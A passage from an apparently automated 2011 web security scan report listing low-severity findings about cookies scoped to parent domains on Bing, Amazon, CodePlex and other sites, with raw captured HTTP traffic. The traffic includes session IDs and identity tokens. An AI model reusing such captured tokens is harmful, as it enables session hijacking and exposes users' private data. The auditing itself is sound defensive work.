MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1296391908891:ss=1296391908891; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=de6cd851-c13e-496a-b118-22137b8dc5b1&Microsoft.CreationDate=01/30/2011 14:50:57&Microsoft.LastVisitDate=01/30/2011 14:50:57&Microsoft.NumberOfVisits=1&SessionCookie.Id=699284D5514B373BB0DF32C40A1FD561; domain=microsoft.com; expires=Sun, 30-Jan-2011 15:20:57 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/30/2011 14:50:57&Microsoft.VisitStartDate=01/30/2011 14:50:57&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=2&Microsoft.IdentityToken=v5Wrg5hY0G1ZKTq92W9PB2I2dXUGcRda9bdvn3lRbyw3vtQVr5yKibRJRo344vn/0+gcIZqwCUZupVUxRhccbbSYfclFWlV45y3+IVUoc/VjkW2CxlqI+BKinJOxY8y1lkTlq5kWs6CF3V9Z5Q6o94Ck6jdBc7u2t8CuSL+TAbTnNTyJ3MYpd4KBFZm4Za8S4IvqsfXWsqT1F0ciAHRsLERgadjlrX8XFWgLVhukLjIREUx+k1Tqr+1MZsnlCuY0GyphPKmFlrT72RxmuWrzHhUSFfvfWxUn649vl7e270SMMTDItio1ndIC5dEVOhZe8xd0Qskq/ep2FTBQaRwMNN+kYzj7574EVGUdnNyjc1tSEPiJxjKw8Rj/clSXreouyHXHIrJuzRzX74axWmeyUjTfyMvvqqonr8jGtpMzwOFukpG63L9tBXL/0mSz8FlXS0uSmHuXScgC1XIJcVG8aWoTnKpZPxIXPVGPh63/vmCnYYUJ3Nxe0yHa3BTDjlef5DOBN0JSNIAp3+N0oVL6SUjutOcU+950gT6kex7wcLk=&Microsoft.MicrosoftId=0237-9950-5424-5770; domain=microsoft.com; expires=Mon, 30-Jan-2012 14:50:57 GMT; path=/
Set-Cookie: MS0=864ee6b5e2b44b9cadb6502b2d8e8c54; domain=.microsoft.com; expires=Sun, 30-Jan-2011 15:20:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 14:50:57 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

16.2. http://msn.whitepages.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://msn.whitepages.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

wpn_session=xps_5070%3D1%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; path=/; domain=.whitepages.com
wpn_persistent=max_utype%3Ddefault%26PID%3DTUSnsawQAEcAADI6GyA%26times_seen_invite%3D%26filled_demo_survey%3D%26wp_stage%3Dproduction%26persistent_search_count%3D%26had_successful_search%3D; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.whitepages.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: msn.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.3. http://silverlight.codeplex.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://silverlight.codeplex.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=sav3egusogls5mked5qq0jiw; domain=.codeplex.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: silverlight.codeplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=sav3egusogls5mked5qq0jiw; domain=.codeplex.com; path=/; HttpOnly
X-AspNetMvc-Version: 3.0
P3P: CP="NON DSP COR ADM CUR DEV TAI OUR IND NAV PRE STA"
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:30 GMT
Content-Length: 47853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" class="IE IE7 ">

<head id
...[SNIP]...

16.4. http://t.mookie1.com/t/v1/imp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://t.mookie1.com
Path:	/t/v1/imp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

session=1296350849|1296350849; path=/; domain=.mookie1.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=5845715&migTrackFmtExt=client;io;ad;crtv HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:27:29 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: session=1296350849|1296350849; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

16.5. http://www.amazon.com/gp/product/0470650923 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/0470650923

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=192-2919974-2112928; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=yQ9pIXqVNQ+kictSRtVelTJ1cwo6IQrEPJd+SWonrlO++kyS3eLyIk/nXbtbxx8D0mbpsSGjtlUuYe0vRowEBFX4sJLod/zu37k/IErBpleFnaz490Xa9SJrjYxKo9y6hu8Qw1NAIvP4UUaxU2L8jbY4r+JHs4ZKm4hST9QEmWm4QdymYv1J0wtClao472qWA+wllUTs9XnshUSKK5Zm7V07ZqJFh4wIijJE8gGWy6ub2Eb0pbSAyRM/8LmJTh6hNxn3d/uTTI7mbtQzIJuC04Uu58ASnyvxk5fZ6wzy7FLYCySmGxvLO1zbG7cicDX3t7BaUJKRVQDLOs9+B6raaQASSQzPOHnazizlJ7UsFvCoBiazT7uOFWxYUsf/18czWXcuM7antU7XxMLLqoSkfFWlqwjyu3ae8xXJ53xwMF3gWWGRilFqmd2KJU/GPs60FA1sCx6Rd0c=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:52 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/product/0470650923?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0470650923 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.6. http://www.amazon.com/gp/product/0672333368 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/0672333368

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=185-0119564-6236271; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=Oel7bYwRWS1gKV5RSiNZiK5lZAAokMgjRBrE5HDUyc9ir04+EELG8B5ZvPf93p6q/Wug8LCjECLDGs1NV2Ss5CncqyEhzH4Xx7dc9WlLyukc31H5gDwd1M0N2+5dFhG9r9UQX7bBDo1UvRUWe9CKYp29GbQIzzh4/e34AfsAPvBx1HVvihnL6R0of1OO3HpDP4AGMQXekYYMU4xOPcaCZk0VUxYwQP/RumeAVnei2D4rad8Xugnf2lk0nqBj3rkP6vzCnoFEzmbe3GgDLzEstwODPn9gW6oauV3yNspeqzecQNyMXmsDy/UrRjAUYndEw91zCgoaiXhnp39HquunCVQJJv/M/EGP7xhqBuRl49vBAGLgp8yRAJwJEgmd86mQGKHoS1Ku4VfxXIMdaRhhkLOtFXZRjef7VWDgVqemNz4+2YF2kiCxAGs6W/ltnCEp33kcaW9Sa6E=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:33 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.7. http://www.amazon.com/gp/product/0981511821 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/0981511821

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=192-4783126-1171450; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=w5NxRqtIaF3L4rahG0xqjBB3n3qFCUwofDp3zBWe5EhsjtbYur03xSjQJ9BybU0a50jcTNieFmXXtReKWFRC9VmjzXi0XOC/OFAKRnG7FxTSci1yzlHjHk93BdOFZd0lP2syU01bP9TPGDHRfsl3MIWGi6LFCm6KknGsRmeHY8fn9B/9V80kP771c+DIVHNbXgbdUStVjMbObwSMw0PsU1t5OEXrbvibQByiwa/enRat+18rO1z/R5x72/itj1Hgk/9qruaLuAMz0XARYys99VN3UXRqpAZ5ZdeRF0tpgFHr5oNT5iwGE41ntxzwpuWVgDuzqVnkzcVQMTPlrDEuvjne19cXXCziPz1UvkP6Lli9UrikpcpmBibUKKWw06dJpIda0iRpYtxcMRQ2Kw/KAsxg3VFJrlcfJyClK5xaGGuIOxZCz57xNTqoWJehRZwKjuk3GB7s/Rg=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:49 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/product/0981511821?ie=UTF8&tag=silverlightnet-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0981511821 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:30:48 GMT
Server: Server
x-amz-id-1: 04T12HTYNC9C14B5HM4X
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: XeMb8ZphbyEceEV8uZ/rPWye3cxGU6y1x/oV8aO+RYhm6u/E/f5MILGVJEj9+KgY
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=192-4783126-1171450; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=w5NxRqtIaF3L4rahG0xqjBB3n3qFCUwofDp3zBWe5EhsjtbYur03xSjQJ9BybU0a50jcTNieFmXXtReKWFRC9VmjzXi0XOC/OFAKRnG7FxTSci1yzlHjHk93BdOFZd0lP2syU01bP9TPGDHRfsl3MIWGi6LFCm6KknGsRmeHY8fn9B/9V80kP771c+DIVHNbXgbdUStVjMbObwSMw0PsU1t5OEXrbvibQByiwa/enRat+18rO1z/R5x72/itj1Hgk/9qruaLuAMz0XARYys99VN3UXRqpAZ5ZdeRF0tpgFHr5oNT5iwGE41ntxzwpuWVgDuzqVnkzcVQMTPlrDEuvjne19cXXCziPz1UvkP6Lli9UrikpcpmBibUKKWw06dJpIda0iRpYtxcMRQ2Kw/KAsxg3VFJrlcfJyClK5xaGGuIOxZCz57xNTqoWJehRZwKjuk3GB7s/Rg=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:49 2011 GMT
Content-Length: 312688

<html>
<head>

<style type="text/css"><!--

BODY { font-
...[SNIP]...

16.8. http://www.amazon.com/gp/product/184968006X previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/184968006X

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=180-2237308-2659866; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=eHjsire/T0R7tdwagP8TcPZKxHTTNNEzlEP0ADU6p9fDKp0HUddz5FB1vK4SWFnhMc+scZ3m3MMvdOoMBY3JMfDMgo9VyMfPoh4njOXzH+BQw3FF7fbIOVZ2IDZk0zQNft3m03t/gL+Tvy3Fp+s+IAXdK6TUGa3MgVEkoCKmlXgie4ZhutN7WZcgnsC2goxBTpcCUomgvJOn1FOsZJdpvaOeWwE7d4VopLfVs94lsjI1refuYz4Fh3eO4sF0scjQpxW30YkQtgxE21eMEFTpM3qzTPbz2A4In7Bgd+9yov6kS3a2jmHTnaE+PhrTEqnDDXpdHgngmPdiaQgXuM6nGSPUPALmbdC5KPrDo93c5AVJkz34KeYRlhnIYDw9LgulDl/Iq7uP7A0bF2cLU4kNTRvZoGaE4G4BI5Ct3/CXQEOqN+ABdMJN/2U0eTeT5lbUCjHlpbF1b4Y=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:30:20 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.9. http://www.amazon.com/gp/product/1935182374 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/1935182374

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=187-0383633-5130955; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=ZM4E0es5+/XEPKcb4MMxmuznZiNyR6gzmDyuvhd39TYBscZma+7OBrLUTIyOOP5L3sOxz0fHi+PVrR7mWXqIyqofYHjJvSwGljfj0cWis60uRBkc1sDMnpiFAFA2IIWQcy0VuQkFO/hek0tlyUsNbuYdCElWcPRfXi2EhNSRROn/5eBkOahc4qN0YXGEPSxJXkpZsFFUUSU+6NyU2vkiTcA6YKmyCajS7mMAIbCCQEcVDyHYe/GzA3wLflh2+74ShUEGuIQUYMUcM2sdqOFPBWrtSn3q/r5KXVvVo3NHlIV0vVwFkMcJVoUPOq2S74LF/6hYIm/NwCdL9vCXUOjzqk7tUlQ3znq9WVE1fo0DdyrZ3XKTD152l098UAWXhdfxPyegtMSG3+GMu2CSzmKtj4j6dgItiNp5cZZ5baIxudoffyAijgZcIzX2w8f4DVw+AMxSy/RUheA=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:13 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.10. http://www.bing.com/travel/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

JSESSIONID=32FADE2FA84EF5FA97AB9602B43221A4; Domain=.bing.com; Path=/travel
ETID=BCID-23es9dprqmhf2yz5b70uaphsurhm_VID-8s1eg7na0h4jyz617ujc5pm7spr_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:07:24 GMT; Path=/travel
_SS=SID=1ABB65B487EE44FBB0D3AEF855DF1C31; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:23 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c995d1595d772411ea969529da0bbdb7f; expires=Tue, 29-Jan-2013 17:07:23 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:24 GMT; domain=.bing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 80826
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:07:24 GMT
Connection: close
Set-Cookie: lbc=904; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-23es9dprqmhf2yz5b70uaphsurhm_VID-8s1eg7na0h4jyz617ujc5pm7spr_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:07:24 GMT; Path=/travel
Set-Cookie: JSESSIONID=32FADE2FA84EF5FA97AB9602B43221A4; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=1ABB65B487EE44FBB0D3AEF855DF1C31; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:23 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c995d1595d772411ea969529da0bbdb7f; expires=Tue, 29-Jan-2013 17:07:23 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:24 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

16.11. http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/deals/cheap-flights-to-the-caribbean.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

JSESSIONID=91A2C96FEAD616EEDDD9ECC848595A2F; Domain=.bing.com; Path=/travel
ETID=BCID-ztqi6svu5vffcyz679phcpo04evn_VID-z4lcugfibg3fcmyz48nd68tfhq64b_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:08:44 GMT; Path=/travel
_SS=SID=1068051DB7E84B2BACE10D21337CBEC9; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:08:44 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8ea85c8550be4c23baed6b6abf5423ed; expires=Tue, 29-Jan-2013 17:08:44 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621028&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:08:44 GMT; domain=.bing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/deals/cheap-flights-to-the-caribbean.do HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 123865
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:08:45 GMT
Connection: close
Set-Cookie: lbc=3; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-ztqi6svu5vffcyz679phcpo04evn_VID-z4lcugfibg3fcmyz48nd68tfhq64b_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:08:44 GMT; Path=/travel
Set-Cookie: JSESSIONID=91A2C96FEAD616EEDDD9ECC848595A2F; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=1068051DB7E84B2BACE10D21337CBEC9; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:08:44 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8ea85c8550be4c23baed6b6abf5423ed; expires=Tue, 29-Jan-2013 17:08:44 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621028&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:08:44 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

16.12. http://www.bing.com/travel/deals/last-minute-flight-deals.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/deals/last-minute-flight-deals.do

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

JSESSIONID=A48EA884FEF0FFF60977843516BE3B8B; Domain=.bing.com; Path=/travel
ETID=BCID-zqvs48etgfd15yz5mbf6s748nk29_VID-z6fe286i2v7d0jyz7ntuvlu23m497_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:09:02 GMT; Path=/travel
_SS=SID=E663063A7EEA44019D8EA6796AF3F79D; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:02 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8620ba7d672b4a22bb6826c6ea8bdf69; expires=Tue, 29-Jan-2013 17:09:02 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:02 GMT; domain=.bing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/deals/last-minute-flight-deals.do HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 116356
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:02 GMT
Connection: close
Set-Cookie: lbc=818; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-zqvs48etgfd15yz5mbf6s748nk29_VID-z6fe286i2v7d0jyz7ntuvlu23m497_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:09:02 GMT; Path=/travel
Set-Cookie: JSESSIONID=A48EA884FEF0FFF60977843516BE3B8B; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=E663063A7EEA44019D8EA6796AF3F79D; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:02 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8620ba7d672b4a22bb6826c6ea8bdf69; expires=Tue, 29-Jan-2013 17:09:02 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:02 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

16.13. http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

JSESSIONID=0915020A0415116467B0471DBB4BFCCC; Domain=.bing.com; Path=/travel
ETID=BCID-z1frs5ci265ddmyz5ee43ld448c06_VID-n3drr7hochmdyz5qnmnshetag4o_UID-; Domain=.bing.com; Expires=Mon, 28-Jan-2013 23:53:03 GMT; Path=/travel
_HOP=I=1&TS=1296345183; domain=.bing.com; path=/
_SS=SID=1A1CA9064645474DA9C96504F5DBD78E; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&qpvt=hawaii+hotels&cid=msn_tab&form=trvcon HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
